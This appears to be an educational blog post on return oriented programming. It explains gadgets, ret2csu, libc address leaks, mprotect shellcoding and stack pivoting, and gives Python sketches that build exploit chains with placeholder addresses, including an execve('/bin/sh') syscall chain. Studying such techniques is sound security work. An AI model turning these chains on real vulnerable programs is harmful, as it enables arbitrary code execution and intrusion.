[Binary Exploitation] Return Oriented Programming

Buffer overflows, probably the most famous CWE in the world, can be exploited in numerous ways, one of which is return oriented programming. In this post, I will explain the different ways to exploit a buffer overflow with return oriented programming.

1. Prerequisites

As with many other binary exploitation techniques, knowledge of how assembly works is very useful. To understand what I explain in this post, it is recommended that you know about:

Buffer overflows
Registers, especially the stack pointer
Function calls in assembly
Pointers

2. Return oriented programming in a nutshell

Return oriented programming (ROP) is exactly what its name implies: programming by returning. Every call instruction in assembly does two things: it pushes the address of the next instruction onto the stack, and it sets the instruction pointer to the call target. Almost every call instruction is paired with a later ret instruction, which pops the value at the top of the stack and places it into the instruction pointer.

This ret behavior is the heart of return oriented programming. If the attacker can change the return address that was previously pushed onto the stack, say with a buffer overflow, the next ret loads the attacker's value into the instruction pointer, so they can redirect execution wherever they want.
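To make this concrete, here is a small Python model (not real exploit code) of a 64-bit stack frame laid out as buffer, saved rbp, and return address. The 16-byte buffer size and all addresses are made-up values for illustration; the point is that an unchecked copy past the end of the buffer replaces exactly the value that ret will pop.

```python
import struct

BUF_SIZE = 16  # hypothetical size of the vulnerable local buffer


def build_frame(return_address: int, saved_rbp: int) -> bytearray:
    """Model a 64-bit stack frame as [buffer][saved rbp][return address]."""
    frame = bytearray(BUF_SIZE)
    frame += struct.pack("<Q", saved_rbp)
    frame += struct.pack("<Q", return_address)
    return frame


def unsafe_copy(frame: bytearray, data: bytes) -> None:
    """Copy data into the buffer without any length check, like gets() would."""
    frame[0:len(data)] = data


def do_ret(frame: bytearray) -> int:
    """Model ret: pop the saved return address into the instruction pointer."""
    offset = BUF_SIZE + 8  # skip the buffer and the saved rbp
    return struct.unpack("<Q", frame[offset:offset + 8])[0]


frame = build_frame(return_address=0x401234, saved_rbp=0x7FFE0000)
# 16 bytes fill the buffer, 8 bytes clobber saved rbp, the last 8 replace the return address
payload = b"A" * BUF_SIZE + b"B" * 8 + struct.pack("<Q", 0xDEADBEEF)
unsafe_copy(frame, payload)
new_rip = do_ret(frame)  # 0xdeadbeef, the attacker-chosen address
```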

3. Gadgets

A common term in return oriented programming is the gadget. Gadgets are small pieces of code that end in a ret instruction. Here are a few examples; you can find gadgets like these in almost any ELF binary.

Gadgets are used to create what is called a ROP chain.

3.1. Finding gadgets

The gadgets in the example above were found with a tool. Popular tools for this are ropper and ROPgadget.
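The core idea behind these tools can be sketched in a few lines of Python: find every ret byte (0xc3) and treat the few bytes before it as candidate gadget starts. This is a simplified sketch; real tools such as ropper and ROPgadget also disassemble each candidate and discard those that do not decode to valid instructions. The bytes used here are the pop r12 to pop r15 ; ret tail of the __libc_csu_init listing later in this post.

```python
def find_ret_gadgets(code: bytes, base: int, max_len: int = 4) -> dict:
    """Map address -> bytes for every sequence of up to max_len bytes ending in ret (0xc3)."""
    gadgets = {}
    for i, byte in enumerate(code):
        if byte != 0xC3:
            continue
        # every start position up to max_len - 1 bytes before the ret is a candidate
        for start in range(max(0, i - max_len + 1), i + 1):
            gadgets[base + start] = code[start:i + 1]
    return gadgets


# pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret, starting at 0x40076c
tail = bytes.fromhex("415c415d415e415fc3")
gadgets = find_ret_gadgets(tail, base=0x40076C)
# 0x5f 0xc3 decodes as pop rdi ; ret
pop_rdi_ret = [addr for addr, raw in gadgets.items() if raw == b"\x5f\xc3"]
```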

4. ROP chains

A ROP chain is a series of gadgets that the attacker runs one after another to modify registers or data in the stack, heap, or bss. ROP chains work because every gadget ends in a ret instruction: if two or more gadget addresses are placed consecutively on the stack, then when the first gadget finishes, its ret pops the next address and execution continues at the next gadget. Here’s an illustration of a ROP chain (source):

If you are still confused, go ahead and watch this video from LiveOverflow. I hope it helps.
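If code helps more than pictures, the following Python sketch simulates how consecutive ret instructions walk through a chain. The gadget addresses, the target function, and the run_chain helper are all hypothetical, and only two gadget types (pop rdi ; ret and pop rsi ; ret) are modelled.

```python
import struct

# Hypothetical gadget addresses; each maps to the register its "pop <reg> ; ret" loads.
GADGETS = {
    0x401000: "rdi",  # pop rdi ; ret
    0x401010: "rsi",  # pop rsi ; ret
}
TARGET = 0x401100  # hypothetical function the chain finally returns into


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def run_chain(stack: bytes) -> tuple:
    """Follow ret-driven execution through known gadgets; return (final rip, registers)."""
    words = list(struct.unpack(f"<{len(stack) // 8}Q", stack))
    regs = {}
    rsp = 0
    rip = words[rsp]  # the hijacked ret pops the first gadget address
    rsp += 1
    while rip in GADGETS:
        regs[GADGETS[rip]] = words[rsp]  # pop <reg>
        rsp += 1
        rip = words[rsp]  # ret: pop the next address into rip
        rsp += 1
    return rip, regs


chain = p64(0x401000) + p64(0x1111) + p64(0x401010) + p64(0x2222) + p64(TARGET)
final_rip, regs = run_chain(chain)
```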

5. Techniques to exploit ROP

By now you probably understand how ROP works and what a ROP chain is. That alone isn’t enough to get RCE, though, so I will show you the techniques I know for exploiting ROP.

1. Jumping to a function
Sometimes, instead of jumping to small pieces of code, jumping to an entire function can be useful. Since (almost) all functions end with a ret instruction, chaining is still possible.

2. Setting the function's parameters
Most functions require parameters to work properly. However, where the parameters are stored differs between 32-bit and 64-bit architectures:

For 32-bit, the function parameters are passed on the stack, directly after the return address.
For 64-bit (the System V calling convention used on Linux), the first 6 parameters are passed in registers, namely rdi, rsi, rdx, rcx, r8, and r9. If the function requires more than 6 parameters, the remaining ones are passed on the stack.

3. The problem with 32-bit
When jumping to a function in a 32-bit binary, the parameters are on the stack. This interferes with our ROP chain: the parameters occupy the stack slots right after the function's return address, which is exactly where the next gadget addresses would go, and parameters are usually not valid addresses of executable code. However, there is a solution to this problem, which is to build the payload like this:

(address of the function to return to) + (address of the function containing the buffer overflow) + (function parameters)

With a payload like this, after the function is done executing, execution will return to the function where the buffer overflow is located. Then, we can exploit the buffer overflow again, and create a brand new ROP chain.
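Here is a minimal Python sketch of that 32-bit layout. The 44-byte offset to the saved return address and the addresses of puts@plt, the vulnerable function, and puts@got are all hypothetical placeholders. The resulting payload calls puts(puts@got) and then returns into the vulnerable function for a second round.

```python
import struct


def p32(value: int) -> bytes:
    return struct.pack("<I", value)


def build_x86_payload(offset: int, func: int, vuln_func: int, *args: int) -> bytes:
    """(function to return to) + (vulnerable function) + (function parameters)."""
    padding = b"A" * offset  # fill the buffer up to the saved return address
    # func runs first; when it returns, it pops vuln_func; args sit where func expects them
    return padding + p32(func) + p32(vuln_func) + b"".join(p32(a) for a in args)


# Hypothetical values; take the real ones from the target binary.
OFFSET = 44
PUTS_PLT = 0x08049030
VULN = 0x08049196
PUTS_GOT = 0x0804C00C

payload = build_x86_payload(OFFSET, PUTS_PLT, VULN, PUTS_GOT)
```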

4. The problem with 64-bit
When jumping to a function in a 64-bit binary, the first 6 parameters are passed in registers. Registers live inside the CPU rather than on the stack, so we can’t use the buffer overflow to change their values directly. However, as in 32-bit, there is a solution.

In binaries compiled with gcc against older versions of glibc (it was removed in glibc 2.34), there is a function called __libc_csu_init. This function is sort of like a constructor for your entire program: it runs the program's initialization routines before main. You can learn more about it here. Let’s see if we can find any useful gadgets in this function.

0x0000000000400710 <+0>:	push   r15
0x0000000000400712 <+2>:	push   r14
0x0000000000400714 <+4>:	mov    r15,rdx
0x0000000000400717 <+7>:	push   r13
0x0000000000400719 <+9>:	push   r12
0x000000000040071b <+11>:	lea    r12,[rip+0x2006ee]        # 0x600e10
0x0000000000400722 <+18>:	push   rbp
0x0000000000400723 <+19>:	lea    rbp,[rip+0x2006ee]        # 0x600e18
0x000000000040072a <+26>:	push   rbx
0x000000000040072b <+27>:	mov    r13d,edi
0x000000000040072e <+30>:	mov    r14,rsi
0x0000000000400731 <+33>:	sub    rbp,r12
0x0000000000400734 <+36>:	sub    rsp,0x8
0x0000000000400738 <+40>:	sar    rbp,0x3
0x000000000040073c <+44>:	call   0x400498 <_init>
0x0000000000400741 <+49>:	test   rbp,rbp
0x0000000000400744 <+52>:	je     0x400766 <__libc_csu_init+86>
0x0000000000400746 <+54>:	xor    ebx,ebx
0x0000000000400748 <+56>:	nop    DWORD PTR [rax+rax*1+0x0]
0x0000000000400750 <+64>:	mov    rdx,r15
0x0000000000400753 <+67>:	mov    rsi,r14
0x0000000000400756 <+70>:	mov    edi,r13d
0x0000000000400759 <+73>:	call   QWORD PTR [r12+rbx*8]
0x000000000040075d <+77>:	add    rbx,0x1
0x0000000000400761 <+81>:	cmp    rbp,rbx
0x0000000000400764 <+84>:	jne    0x400750 <__libc_csu_init+64>
0x0000000000400766 <+86>:	add    rsp,0x8
0x000000000040076a <+90>:	pop    rbx
0x000000000040076b <+91>:	pop    rbp
0x000000000040076c <+92>:	pop    r12
0x000000000040076e <+94>:	pop    r13
0x0000000000400770 <+96>:	pop    r14
0x0000000000400772 <+98>:	pop    r15
0x0000000000400774 <+100>:	ret

It might seem like there isn’t much, but this function has a very important gadget. The pop r15 and pop r14 instructions both consist of two bytes. Let’s see what they are.

0x400770 <__libc_csu_init+96>:	0x41	0x5e

0x400772 <__libc_csu_init+98>:	0x41	0x5f

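Both start with 0x41, a REX prefix that tells the CPU to use the extended registers r8 to r15. The second byte is what is really interesting: if we skip the prefix and disassemble from one byte later, we get: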

0x400771 <__libc_csu_init+97>:	pop    rsi

0x400773 <__libc_csu_init+99>:	pop    rdi

Well, that’s interesting. Now we have two gadgets, both in a function that is almost always present, which allow us to control the first two parameters of a function. Note that the gadget at 0x400771 is really pop rsi ; pop r15 ; ret, so the chain needs one extra filler value for r15. Gadgets for the other 4 parameter registers are much rarer, but functions that need 6 parameters are not very common either.
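To double-check the misaligned decoding, here is a tiny Python decoder that only understands pop r64 (opcodes 0x58 to 0x5f, optionally preceded by the 0x41 REX.B prefix) and ret. It is a hand-rolled sketch, not a general disassembler. Starting one byte into pop r14 also shows the extra pop r15 in the rsi gadget.

```python
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
EXT_REGS = ["r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]


def decode_pops(code: bytes, start: int) -> list:
    """Decode only 'pop r64' (0x58-0x5f, optionally with the 0x41 REX.B prefix) and 'ret'."""
    out = []
    i = start
    while i < len(code):
        b = code[i]
        if b == 0x41 and i + 1 < len(code) and 0x58 <= code[i + 1] <= 0x5F:
            out.append("pop " + EXT_REGS[code[i + 1] - 0x58])  # REX.B selects r8-r15
            i += 2
        elif 0x58 <= b <= 0x5F:
            out.append("pop " + REGS[b - 0x58])
            i += 1
        elif b == 0xC3:
            out.append("ret")
            break
        else:
            raise ValueError(f"unsupported byte {b:#04x} at offset {i}")
    return out


tail = bytes.fromhex("415e415fc3")  # pop r14 ; pop r15 ; ret at 0x400770
for offset in (0, 1, 3):
    print(hex(0x400770 + offset), " ; ".join(decode_pops(tail, offset)))
# 0x400770 pop r14 ; pop r15 ; ret
# 0x400771 pop rsi ; pop r15 ; ret
# 0x400773 pop rdi ; ret
```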

5. The problem with 64-bit, part 2
Later in this post, I will talk about calling mprotect. Before that, note that mprotect takes 3 parameters: address, length, and prot. We just learned an easy way to control the first two parameters of a function using __libc_csu_init, but we still can’t control the third one, which is passed in the rdx register. There is actually a gadget we can use for this, also found in __libc_csu_init:

0x0000000000400750 <+64>:	mov    rdx,r15
0x0000000000400753 <+67>:	mov    rsi,r14
0x0000000000400756 <+70>:	mov    edi,r13d
0x0000000000400759 <+73>:	call   QWORD PTR [r12+rbx*8]
0x000000000040075d <+77>:	add    rbx,0x1
0x0000000000400761 <+81>:	cmp    rbp,rbx
0x0000000000400764 <+84>:	jne    0x400750 <__libc_csu_init+64>
0x0000000000400766 <+86>:	add    rsp,0x8
0x000000000040076a <+90>:	pop    rbx
0x000000000040076b <+91>:	pop    rbp
0x000000000040076c <+92>:	pop    r12
0x000000000040076e <+94>:	pop    r13
0x0000000000400770 <+96>:	pop    r14
0x0000000000400772 <+98>:	pop    r15
0x0000000000400774 <+100>:	ret

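Unlike other gadgets, this one is far from a ret instruction, and there are other things to be wary of, namely the call instruction and the jne instruction. In practice, you first return to 0x40076a to pop your values into rbx, rbp, r12, r13, r14, and r15, and then return to 0x400750. Because call QWORD PTR [r12+rbx*8] calls through a pointer, set r12 + rbx*8 to the address of a memory location that holds a pointer to harmless code (for example, a function that simply returns). Then set rbp to rbx + 1, so that after add rbx, 0x1 the comparison is equal and the jne falls through. The add rsp, 0x8 can also be problematic: it skips one stack slot, so the chain needs a filler value before the six values that get popped again. Finally, mov edi, r13d only sets the lower 32 bits of rdi.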
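Putting those rules together, such a chain (often called ret2csu) can be sketched in Python as below. The two gadget addresses come from the listing above; the function pointer address and the return address used in the test are hypothetical, and ret2csu is just a label for this sketch.

```python
import struct

CSU_POP = 0x40076A  # pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
CSU_MOV = 0x400750  # mov rdx,r15 ; mov rsi,r14 ; mov edi,r13d ; call [r12+rbx*8] ; ...


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def ret2csu(func_ptr_addr: int, edi: int, rsi: int, rdx: int, next_addr: int) -> bytes:
    """Chain that calls *func_ptr_addr(edi, rsi, rdx) and then returns to next_addr."""
    if edi >= 2**32:
        raise ValueError("mov edi, r13d only sets the low 32 bits of rdi")
    chain = p64(CSU_POP)
    chain += p64(0)              # rbx = 0, so the call goes through [r12]
    chain += p64(1)              # rbp = 1, so rbx + 1 == rbp and jne falls through
    chain += p64(func_ptr_addr)  # r12 = address of a pointer to the function
    chain += p64(edi)            # r13 -> edi
    chain += p64(rsi)            # r14 -> rsi
    chain += p64(rdx)            # r15 -> rdx
    chain += p64(CSU_MOV)
    chain += p64(0) * 7          # filler for add rsp, 0x8 plus the six pops
    chain += p64(next_addr)      # the final ret lands here
    return chain
```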

Now that you can control the first three parameters of a function, you can call functions like mprotect, execve, fgets, and more. But of course, calling those functions requires knowing their addresses.

6. Leaking addresses
Now that we know the basics, let’s try to create an arbitrary read.

I expect you as the reader already know about ASLR; if you don’t, go and read about it first. ASLR is active by default on most machines, and it randomizes the stack, heap, and libc addresses. However, the addresses of the binary’s own code and bss are only randomized if the binary is compiled with PIE. Some binaries have PIE disabled, which gives us fixed addresses for ROP gadgets, the Global Offset Table (GOT), and the Procedure Linkage Table (PLT). If you don’t know about the GOT and PLT, here is a video from LiveOverflow that you can watch.

Most binaries have a way to print text to the screen, such as puts, printf, or write. These functions can print data from (almost) any address in the binary, so with a ROP chain we can abuse them to leak libc and/or stack addresses.
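As a rough sketch, the 64-bit version of such a leak chain could be built like this in Python. Every address and the 40-byte offset are hypothetical placeholders for a non-PIE binary. The chain calls puts(puts@got) through a pop rdi ; ret gadget and then returns to main so the overflow can be used again.

```python
import struct


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def u64(data: bytes) -> int:
    return struct.unpack("<Q", data.ljust(8, b"\x00"))[0]


# Hypothetical addresses for a non-PIE 64-bit binary.
OFFSET = 40          # bytes from the start of the buffer to the saved return address
POP_RDI = 0x400773   # pop rdi ; ret (e.g. found with the __libc_csu_init trick)
PUTS_PLT = 0x400500
PUTS_GOT = 0x601018
MAIN = 0x400650      # return here to exploit the overflow a second time


def leak_chain() -> bytes:
    """puts(puts@GOT), then return to main."""
    return b"A" * OFFSET + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN)


def parse_leak(line: bytes) -> int:
    """puts stops at the first NUL byte, so the top zero bytes of the address are missing."""
    return u64(line.removesuffix(b"\n")[:8])
```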

Here’s an example. In this binary we have a buffer overflow and can change the return address. I’ll set the return address to the address of puts in the PLT, and set the first parameter to the address of the puts entry in the GOT.

Boom, we got a libc address, more specifically the address of puts. Now we can calculate the address of system and eventually get a shell.
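The calculation itself is just subtraction and addition, shown below in Python. The two offsets and the leaked value are hypothetical; offsets differ between libc builds, so they must be read from the exact libc the target uses. The page-alignment check is a cheap sanity test that the leak and the libc match.

```python
# Hypothetical offsets for one particular libc; read the real ones from the
# target's libc (for example with `readelf -s libc.so.6`).
PUTS_OFFSET = 0x80970
SYSTEM_OFFSET = 0x4F440


def libc_base_from_leak(puts_addr: int) -> int:
    base = puts_addr - PUTS_OFFSET
    # libc is mapped at a page boundary, so a correct base ends in 000
    if base & 0xFFF:
        raise ValueError("base is not page aligned: wrong libc or bad leak")
    return base


leaked_puts = 0x7F1234580970  # hypothetical leaked address of puts
libc_base = libc_base_from_leak(leaked_puts)
system_addr = libc_base + SYSTEM_OFFSET
```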

7. Shellcoding
Almost every binary has the W^X (also called NX) protection. It prevents memory from being writable and executable at the same time, so we cannot simply write new code at runtime and run it. However, certain libc functions can change the permissions of a block of memory, one of them being mprotect. mprotect takes three parameters: address, length, and prot. Since we can effectively control the first three function parameters, we can call this function and change the permissions of certain blocks of memory.
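Because mprotect works on whole pages, its address argument must be page aligned. Here is a small Python sketch of computing the three arguments, assuming 4 KiB pages and the Linux values of the PROT_* flags (1, 2 and 4); the bss address is hypothetical.

```python
PAGE_SIZE = 0x1000                          # assumed 4 KiB pages
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4  # Linux values of the mprotect flags


def mprotect_args(addr: int, length: int) -> tuple:
    """Return (addr, len, prot) covering [addr, addr + length) with rwx permissions."""
    start = addr & ~(PAGE_SIZE - 1)                           # round down to a page
    end = (addr + length + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)  # round up to a page
    return start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC


# e.g. 0x100 bytes of shellcode at a hypothetical bss address 0x601040
args = mprotect_args(0x601040, 0x100)  # (0x601000, 0x1000, 7)
```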

Here’s an example: in this binary, I’ll change the permissions of the bss area from rw- to rwx. Then, using a function like fgets, we can write shellcode to that area and jump to it.

8. One gadget RCE
The previous tricks both required the attacker to set up function parameters before calling a function. As it turns out, there are certain pieces of code in libc that invoke a shell without us having to set any function parameters. However, certain constraints must be satisfied before they can be used. The constraints usually require certain registers or memory locations to hold specific values.

To find these gadgets, a tool called one_gadget can be used. It prints the offset of each gadget in a given libc along with the constraints it needs. Here’s an example of me using one_gadget:

9. Static binaries
In some cases, binaries are compiled statically instead of dynamically. As a result, PIE is usually disabled (static PIE exists, but it is uncommon), but libc functions that the program itself doesn’t use, such as system, are not linked in and therefore aren’t available.

In this case, there are two things I like to do: call the function _dl_make_stack_executable, or invoke a syscall using only gadgets.

9.1. _dl_make_stack_executable
In statically linked binaries, there is a function called _dl_make_stack_executable. It calls mprotect to make the stack’s permissions rwx, but two conditions must be satisfied first. Let’s look at the disassembly:

0x00000000004717e0 <+0>:	mov    rsi,QWORD PTR [rip+0x250a49]        # 0x6c2230 <_dl_pagesize>
0x00000000004717e7 <+7>:	push   rbx
0x00000000004717e8 <+8>:	mov    rbx,rdi
0x00000000004717eb <+11>:	mov    rax,QWORD PTR [rdi]
0x00000000004717ee <+14>:	mov    rdi,rsi
0x00000000004717f1 <+17>:	neg    rdi
0x00000000004717f4 <+20>:	and    rdi,rax
0x00000000004717f7 <+23>:	cmp    rax,QWORD PTR [rip+0x24f78a]        # 0x6c0f88 <__libc_stack_end>
0x00000000004717fe <+30>:	jne    0x47181f <_dl_make_stack_executable+63>
0x0000000000471800 <+32>:	mov    edx,DWORD PTR [rip+0x24f7da]        # 0x6c0fe0 <__stack_prot>
0x0000000000471806 <+38>:	call   0x435690 <mprotect>
0x000000000047180b <+43>:	test   eax,eax
0x000000000047180d <+45>:	jne    0x471826 <_dl_make_stack_executable+70>
0x000000000047180f <+47>:	mov    QWORD PTR [rbx],0x0
0x0000000000471816 <+54>:	or     DWORD PTR [rip+0x2509f3],0x1        # 0x6c2210 <_dl_stack_flags>
0x000000000047181d <+61>:	pop    rbx
0x000000000047181e <+62>:	ret    
0x000000000047181f <+63>:	mov    eax,0x1
0x0000000000471824 <+68>:	pop    rbx
0x0000000000471825 <+69>:	ret    
0x0000000000471826 <+70>:	mov    rax,0xffffffffffffffc0
0x000000000047182d <+77>:	pop    rbx
0x000000000047182e <+78>:	mov    eax,DWORD PTR fs:[rax]

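This is a 64-bit executable, so the function parameters are in registers. Looking carefully, the function loads the value that rdi points to and only continues if it equals __libc_stack_end, so rdi should be set to the address of __libc_stack_end. It then calls mprotect on the page containing that stack address, with the value of __stack_prot as the prot argument. So if rdi holds the address of __libc_stack_end and __stack_prot has been set to 7 (PROT_READ | PROT_WRITE | PROT_EXEC), we get a call to mprotect that makes that page of the stack rwx.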
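The following Python model mirrors the disassembly above step by step, using the two data addresses shown there; the memory contents are made-up values. It shows why rdi must hold the address of __libc_stack_end and that only one page, the one containing that stack address, is passed to mprotect.

```python
LIBC_STACK_END = 0x6C0F88  # &__libc_stack_end, from the disassembly above
STACK_PROT = 0x6C0FE0      # &__stack_prot, from the disassembly above


def dl_make_stack_executable(rdi: int, mem: dict, pagesize: int = 0x1000):
    """Model the function's logic; return the mprotect arguments, or None on failure."""
    rax = mem[rdi]                          # mov rax, QWORD PTR [rdi]
    if rax != mem[LIBC_STACK_END]:          # cmp rax, [__libc_stack_end] ; jne -> return 1
        return None
    addr = rax & -pagesize                  # neg rdi ; and rdi, rax (round down to a page)
    return addr, pagesize, mem[STACK_PROT]  # mprotect(rdi, rsi, edx)


mem = {
    LIBC_STACK_END: 0x7FFD1234ABCD,  # hypothetical value of __libc_stack_end
    STACK_PROT: 7,                   # assumed already overwritten with rwx
    0x6C1000: 0,                     # some unrelated memory
}
args_ok = dl_make_stack_executable(LIBC_STACK_END, mem)
args_bad = dl_make_stack_executable(0x6C1000, mem)
```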

9.2. Syscall gadgets
The other trick I like to do is to build a ROP chain that invokes a syscall. For example, to call execve("/bin/sh", NULL, NULL) in 64-bit, I have to set rax to the syscall number (59) and rdi, rsi, and rdx to the arguments, then jump to a syscall instruction. In 32-bit, I have to set eax (11), ebx, ecx, and edx, then jump to an int 0x80 instruction. This may seem hard, but it’s actually easier than calling _dl_make_stack_executable.
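As an illustration, here is what such a 64-bit execve chain could look like in Python. All gadget addresses and the location of the "/bin/sh" string are hypothetical; in a real static binary you would find the gadgets with ropper or ROPgadget and write the string somewhere writable (for example the bss) beforehand.

```python
import struct


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


# Hypothetical gadget addresses in a static 64-bit binary.
POP_RAX = 0x4005AF   # pop rax ; ret
POP_RDI = 0x400686   # pop rdi ; ret
POP_RSI = 0x410093   # pop rsi ; ret
POP_RDX = 0x44A155   # pop rdx ; ret
SYSCALL = 0x40120C   # syscall
BINSH = 0x6C1000     # hypothetical writable address already holding b"/bin/sh\0"
SYS_EXECVE = 59      # execve syscall number on x86-64 Linux (11 on 32-bit x86)


def execve_chain() -> bytes:
    """execve("/bin/sh", NULL, NULL) using only gadgets."""
    return (p64(POP_RAX) + p64(SYS_EXECVE)
            + p64(POP_RDI) + p64(BINSH)
            + p64(POP_RSI) + p64(0)
            + p64(POP_RDX) + p64(0)
            + p64(SYSCALL))
```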

10. Stack pivoting
The last trick I will explain is stack pivoting. What we perceive as the “stack” is actually just an abstract concept: the stack is simply the area of memory that the stack pointer points to. If we can change the stack pointer to point to a different location in memory, then that new location becomes the “stack”.

What good does this do for us? In some binaries, the ROP chain we can write is limited, say to 2-3 entries at a time. In that case, for 64-bit binaries, setting rdi, jumping to puts, and returning to main (four entries) won’t be possible.

But what if we could write a long chain in a different location, say the bss, or maybe even the heap? To use that location as our ROP chain, we need to set the stack pointer to point to it. We could try to find an instruction like mov rsp, rax, but that is almost never present in dynamically linked binaries.

Instead of a generic instruction like that, we can use an unexpected one: leave. According to the NASM docs, leave does two things: mov esp, ebp and then pop ebp (in 64-bit, mov rsp, rbp and pop rbp).

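As you know, the saved base pointer is located right before the return address, so we can corrupt it every time we corrupt the return address. When the vulnerable function executes its own leave, our fake value is loaded into rbp. If we then return to another leave; ret gadget instead of a function, that second leave copies our fake rbp into rsp, pivoting the stack to another location in memory. Because that leave also pops one value into rbp, the chain at the new location should start with a filler value, followed by the gadget addresses.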
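The two leave ; ret steps can be traced with a small Python model in which memory is a dictionary of 8-byte words. The frame address, the heap address of the fake stack, and the gadget addresses are all hypothetical. Note how the first word of the fake stack is consumed by pop rbp, so the real chain starts 8 bytes in.

```python
def leave(regs: dict, mem: dict) -> None:
    regs["rsp"] = regs["rbp"]       # mov rsp, rbp
    regs["rbp"] = mem[regs["rsp"]]  # pop rbp
    regs["rsp"] += 8


def ret(regs: dict, mem: dict) -> None:
    regs["rip"] = mem[regs["rsp"]]  # pop rip
    regs["rsp"] += 8


LEAVE_RET = 0x4006DB     # hypothetical leave ; ret gadget
FAKE = 0x1D5A2A0         # hypothetical heap address of the long chain (from a heap leak)
FIRST_GADGET = 0x400773  # hypothetical first gadget of the long chain

frame_rbp = 0x7FFE0000   # hypothetical rbp of the vulnerable function
mem = {
    frame_rbp: FAKE,          # overwritten saved rbp
    frame_rbp + 8: LEAVE_RET, # overwritten return address
    FAKE: 0xDEADBEEF,         # filler, popped into rbp by the second leave
    FAKE + 8: FIRST_GADGET,   # where the long chain really begins
}
regs = {"rbp": frame_rbp, "rsp": frame_rbp - 0x30, "rip": 0}

leave(regs, mem); ret(regs, mem)  # the vulnerable function's own epilogue: rbp = FAKE
leave(regs, mem); ret(regs, mem)  # our leave ; ret gadget: rsp moves to the heap
```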

Let’s look at an example. In this binary, I’ve created a ROP chain on the heap and also obtained a heap leak. I’m going to pivot the stack onto the heap to get a longer ROP chain.

11. Final words

In conclusion, ROP is a very powerful way to exploit buffer overflows. This isn’t the end of ROP, though, as there are still techniques such as ret2dl_resolve, SROP, and more.